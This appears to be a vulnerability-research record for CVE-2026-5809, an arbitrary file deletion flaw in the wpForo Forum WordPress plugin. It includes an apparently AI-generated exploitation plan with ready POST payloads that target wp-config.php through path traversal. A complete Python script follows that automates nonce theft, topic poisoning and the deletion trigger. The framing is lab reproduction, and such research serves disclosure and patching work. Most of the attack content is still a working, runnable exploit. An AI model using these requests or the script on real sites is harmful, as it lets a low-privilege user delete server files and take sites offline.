[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fphKjCkuVpSN6_KbrD1_rxn8ohKhZbndfC-ZEw4zv6wQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"source_links":37},"CVE-2026-5809","wpforo-forum-authenticated-subscriber-arbitrary-file-deletion-via-databodyfileurl-parameter","wpForo Forum \u003C= 3.0.2 - Authenticated (Subscriber+) Arbitrary File Deletion via 'data[body][fileurl]' Parameter","The wpForo Forum plugin for WordPress is vulnerable to Arbitrary File Deletion in versions up to and including 3.0.2. This is due to a two-step logic flaw: the topic_add() and topic_edit() action handlers accept arbitrary user-supplied data[*] arrays from $_REQUEST and store them as postmeta without restricting which fields may contain array values. Because 'body' is included in the allowed topic fields list, an attacker can supply data[body][fileurl] with an arbitrary file path (e.g., wp-config.php or an absolute server path). This poisoned fileurl is persisted to the plugin's custom postmeta database table. 
Subsequently, when the attacker submits wpftcf_delete[]=body on a topic_edit request, the add_file() method retrieves the stored postmeta record, extracts the attacker-controlled fileurl, passes it through wpforo_fix_upload_dir() which only rewrites legitimate wpforo upload paths and returns all other paths unchanged, and then calls wp_delete_file() on the unvalidated path. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary files writable by the PHP process on the server, including critical files such as wp-config.php.","wpforo",null,"\u003C=3.0.2","3.0.3","high",7.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:L\u002FI:N\u002FA:H","External Control of File Name or Path","2026-04-10 18:51:03","2026-04-14 08:07:42",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F0e46ac8d-89ee-4480-bb96-83f2044a4323?source=api-prod",4,[22,23,24,25,26,27,28,29],"admin\u002Fassets\u002Fcss\u002Fai-features.css","admin\u002Fassets\u002Fjs\u002Fai-features.js","admin\u002Fpages\u002Ftabs\u002Fai-features-tab-rag-indexing.php","admin\u002Fsettings\u002Fai.php","classes\u002FAIChatbot.php","classes\u002FAIClient.php","classes\u002FAIContentModeration.php","classes\u002FAPI.php","researched",false,3,"This research plan outlines the steps required to demonstrate an authenticated arbitrary file deletion vulnerability in the **wpForo Forum** plugin (versions \u003C= 3.0.2).\n\n### 1. Vulnerability Summary\nThe wpForo Forum plugin is vulnerable to **Arbitrary File Deletion** due to a two-step logic flaw in the topic management system.\n1.  **Improper Metadata Storage**: The `topic_add()` and `topic_edit()` action handlers accept a `data` array from `$_REQUEST`. The plugin fails to restrict the structure of fields like `body`, allowing an attacker to supply an array containing a `fileurl` key (e.g., `data[body][fileurl]`). 
This unvalidated path is saved to the plugin's custom topic metadata.\n2.  **Insecure Deletion**: When a user submits an edit request with the `wpftcf_delete[]` parameter set to a field name (e.g., `wpftcf_delete[]=body`), the plugin's `add_file()` method retrieves the stored metadata. It passes the attacker-controlled `fileurl` through `wpforo_fix_upload_dir()`, which does not filter absolute or relative paths outside the wpForo directory, and finally calls `wp_delete_file()` on the path.\n\n### 2. Attack Vector Analysis\n*   **Endpoint**: The exploit targets the frontend forum interface where topics are created and edited.\n*   **Action**: `wpfaction=topic_add` (to poison) and `wpfaction=topic_edit` (to trigger).\n*   **Authentication**: Authenticated (Subscriber-level and above).\n*   **Vulnerable Parameters**: \n    *   `data[body][fileurl]`: Used to store the target file path.\n    *   `wpftcf_delete[]`: Used to trigger the deletion logic for the specified field.\n*   **Preconditions**: At least one forum must be active and accessible to the Subscriber for posting.\n\n### 3. Code Flow (Inferred from Patch and Description)\n1.  **Poisoning Phase (`topic_add` \u002F `topic_edit`)**:\n    *   User sends a POST request with `wpfaction=topic_add`.\n    *   `WPF()->topic->add()` (in `classes\u002FTopics.php` - inferred) receives `$_REQUEST['data']`.\n    *   The `body` field is in the allowed list. Because it is handled as an array, the plugin stores `[ 'fileurl' => '\u002Fpath\u002Fto\u002Ftarget' ]` in the database.\n2.  
**Trigger Phase (`topic_edit`)**:\n    *   User sends a POST request with `wpfaction=topic_edit` and `wpftcf_delete[]=body`.\n    *   The handler calls a method (likely `add_file()`) to process file updates\u002Fdeletions.\n    *   The code identifies `body` in the `wpftcf_delete` array.\n    *   It fetches the stored meta for `body`.\n    *   The `fileurl` value (`\u002Fpath\u002Fto\u002Ftarget`) is passed to `wpforo_fix_upload_dir()`.\n    *   `wp_delete_file('\u002Fpath\u002Fto\u002Ftarget')` is executed.\n\n### 4. Nonce Acquisition Strategy\nThe plugin uses a nonce for topic operations, typically named `wpforo_nonce`.\n\n1.  **Identify Forum**: Find a valid forum ID (`fid`) where the user can post.\n2.  **Navigate**: Use `browser_navigate` to go to the \"Add Topic\" page for that forum: `\u002F?wpf=add-topic&fid=1` (fid varies).\n3.  **Extract Nonce**: Use `browser_eval` to extract the nonce from the hidden form field.\n    ```javascript\n    browser_eval(\"document.querySelector('input[name=\\\"wpforo_nonce\\\"]')?.value\")\n    ```\n4.  **Extract Field Nonce**: If the deletion uses a specific nonce for file management, search for inputs starting with `wpftcf_`.\n\n### 5. 
Exploitation Strategy\n\n#### Step 1: Poisoning (Creating the Topic)\nSend an authenticated POST request (carrying the subscriber's login cookies) to create a new topic with the target file path hidden in the `body` metadata.\n\n*   **Tool**: `http_request`\n*   **Method**: `POST`\n*   **URL**: `http:\u002F\u002Flocalhost:8080\u002Findex.php`\n*   **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body**:\n    ```\n    wpfaction=topic_add\n    &fid=1\n    &wpforo_nonce=[EXTRACTED_NONCE]\n    &data[t_subject]=Exploit Topic\n    &data[body][fileurl]=..\u002F..\u002F..\u002Fwp-config.php\n    ```\n*   **Note**: Extract the `topicid` from the resulting redirect URL or the page content.\n\n#### Step 2: Triggering (Deleting the File)\nSend an authenticated POST request to edit the topic and trigger the deletion of the `body` field.\n\n*   **Tool**: `http_request`\n*   **Method**: `POST`\n*   **URL**: `http:\u002F\u002Flocalhost:8080\u002Findex.php`\n*   **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body**:\n    ```\n    wpfaction=topic_edit\n    &topicid=[TOPIC_ID]\n    &wpforo_nonce=[EXTRACTED_NONCE]\n    &wpftcf_delete[]=body\n    &data[t_subject]=Exploit Trigger\n    &data[body]=cleared\n    ```\n\n### 6. Test Data Setup\n1.  **Subscriber User**: Create a user with the `subscriber` role.\n2.  **Forum Setup**: Ensure at least one forum exists. The WP-CLI command below is an assumption: WP-CLI core ships no `wp forum` command, so if wpForo does not register one, create the forum from the wpForo admin Forums page instead:\n    ```bash\n    wp forum create --title=\"General Discussion\" --slug=\"general\" --status=\"publish\"\n    ```\n3.  **Target File**: Create a dummy file to delete, so the environment is not broken by the test itself (deleting `wp-config.php` takes the site down).\n    ```bash\n    echo \"secret\" > \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002Fdelete-me.txt\n    ```\n    Update the exploit payload `data[body][fileurl]` to point to `\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002Fdelete-me.txt`.\n\n### 7. 
Expected Results\n*   The first request should successfully create a topic.\n*   The second request should return a success message or redirect back to the topic.\n*   The file at the specified path (e.g., `wp-config.php` or `delete-me.txt`) should be deleted from the server.\n\n### 8. Verification Steps\nAfter the HTTP requests, use WP-CLI or filesystem checks to verify the deletion:\n```bash\n# Check if the dummy file still exists\nls \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002Fdelete-me.txt\n# Expected: \"ls: cannot access ... No such file or directory\"\n```\n\n### 9. Alternative Approaches\nIf `topic_add` doesn't allow the initial injection, try injecting during `topic_edit` on an existing topic.\nIf a relative path is used, note that `wp_delete_file()` applies the `wp_delete_file` filter and then calls `unlink()` on the string it is given, so a relative path is resolved against the PHP process's working directory (for a front-end request normally ABSPATH, the directory holding `index.php`), not against the wpForo upload folder. An absolute path such as `\u002Fvar\u002Fwww\u002Fhtml\u002Fwp-config.php` removes that guesswork; if traversal is used instead (e.g. `..\u002F..\u002F..\u002F..\u002Fwp-config.php`), count the `..\u002F` segments from that working directory. `wpforo_fix_upload_dir()` only rewrites paths inside the wpForo upload directory and returns any other path unchanged, so it neither blocks nor re-bases an attacker-supplied path.","gemini-3-flash-preview","2026-04-16 16:03:25","2026-04-16 16:03:55",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","3.0.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpforo\u002Ftags\u002F3.0.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwpforo.3.0.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpforo\u002Ftags\u002F3.0.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwpforo.3.0.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwpforo\u002Ftags"]
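The two-step chain laid out in sections 3 and 5 of the research plan (poison a topic via `topic_add`, then trigger the stored `fileurl` via `topic_edit` with `wpftcf_delete[]=body`), as an added Python reproduction harness. This is example code written for this page, not code from the advisory record, from Wordfence, or from the wpForo plugin. The form field names (`wpfaction`, `fid`, `topicid`, `wpforo_nonce`, `data[t_subject]`, `data[body][fileurl]`, `wpftcf_delete[]`), the add-topic URL shape, and the places where the new topic id is looked for (a `topicid=` query parameter in the redirect or a `data-topicid` attribute in the page) are the plan's inferred names and this example's assumptions, not facts verified against the plugin; the subscriber's session cookie is assumed to be supplied by the caller.

```python
"""Reproduction harness for the wpForo topic_add -> topic_edit deletion chain.

Added example, not code from the advisory or from the wpForo plugin. Field
names and URL shapes are the research plan's inferences (assumptions); check
them against the target version's add-topic form. Run only against a lab
install, with the dummy target file from the plan's test-data step.
"""
import html
import re
import urllib.error
import urllib.parse
import urllib.request
from typing import Optional, Tuple


def extract_nonce(page: str, field: str = "wpforo_nonce") -> Optional[str]:
    """Pull the hidden nonce input out of the add/edit-topic form HTML."""
    f = re.escape(field)
    for pat in (  # both attribute orders: name= before value=, and the reverse
        r'<input[^>]*name=["\']' + f + r'["\'][^>]*value=["\']([^"\']+)["\']',
        r'<input[^>]*value=["\']([^"\']+)["\'][^>]*name=["\']' + f + r'["\']',
    ):
        m = re.search(pat, page, re.I)
        if m:
            return html.unescape(m.group(1))
    return None


def extract_topic_id(text: str) -> Optional[int]:
    """Recover the new topic id from a redirect URL (?topicid=N) or from a
    data-topicid attribute in the page body (both locations are assumptions)."""
    m = re.search(r'(?:[?&]topicid=|data-topicid=["\'])(\d+)', text)
    return int(m.group(1)) if m else None


def poison_body(fid: int, nonce: str, target_path: str) -> str:
    """Step 1 body: topic_add storing the target path under data[body][fileurl].
    urlencode() percent-encodes the [] so PHP still builds the nested array."""
    return urllib.parse.urlencode([
        ("wpfaction", "topic_add"),
        ("fid", str(fid)),
        ("wpforo_nonce", nonce),
        ("data[t_subject]", "Exploit Topic"),
        ("data[body][fileurl]", target_path),
    ])


def trigger_body(topicid: int, nonce: str) -> str:
    """Step 2 body: topic_edit with wpftcf_delete[]=body, which routes the
    stored fileurl into wp_delete_file()."""
    return urllib.parse.urlencode([
        ("wpfaction", "topic_edit"),
        ("topicid", str(topicid)),
        ("wpforo_nonce", nonce),
        ("wpftcf_delete[]", "body"),
        ("data[t_subject]", "Exploit Trigger"),
        ("data[body]", "cleared"),
    ])


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow 3xx: the Location header of the post-create redirect is
    where the topic id is expected to appear."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def _request(opener, url: str, cookie: str, body: Optional[str] = None) -> Tuple[int, str, str]:
    """GET (no body) or POST (urlencoded body); returns (status, Location, html)."""
    data = body.encode() if body is not None else None
    req = urllib.request.Request(url, data=data, method="POST" if data is not None else "GET")
    req.add_header("Cookie", cookie)
    if data is not None:
        req.add_header("Content-Type", "application/x-www-form-urlencoded")
    try:
        with opener.open(req) as resp:
            return resp.status, resp.headers.get("Location", ""), resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:  # 302 lands here because redirects are disabled
        return err.code, err.headers.get("Location", ""), err.read().decode(errors="replace")


def run_chain(base_url: str, cookie: str, fid: int, target_path: str) -> Tuple[int, int]:
    """Poison a fresh topic, then trigger the deletion. Returns (topicid, step-2 status)."""
    opener = urllib.request.build_opener(_NoRedirect)
    _, _, form = _request(opener, f"{base_url}/?wpf=add-topic&fid={fid}", cookie)
    nonce = extract_nonce(form)
    if nonce is None:
        raise RuntimeError("nonce field not found; inspect the add-topic form")
    status, location, page = _request(opener, f"{base_url}/index.php", cookie,
                                      poison_body(fid, nonce, target_path))
    topicid = extract_topic_id(location) or extract_topic_id(page)
    if topicid is None:
        raise RuntimeError(f"topic id not found after topic_add (HTTP {status})")
    status, _, _ = _request(opener, f"{base_url}/index.php", cookie, trigger_body(topicid, nonce))
    return topicid, status


if __name__ == "__main__":
    # Lab values only: the dummy file from the plan's test-data step, never wp-config.php.
    print(run_chain("http://localhost:8080", "<subscriber session cookie>",
                    1, "/var/www/html/wp-content/uploads/delete-me.txt"))
```

After `run_chain()` returns, confirm the outcome on the filesystem as in section 8 (`ls` on the dummy file) rather than trusting the HTTP status, since the plan expects step 2 to return a normal success or redirect either way. The point of the assertion-free `_NoRedirect` handler is that wpForo's post-create redirect is the cheapest place to read the new `topicid`; if the target version puts it elsewhere, adjust `extract_topic_id()` and nothing else.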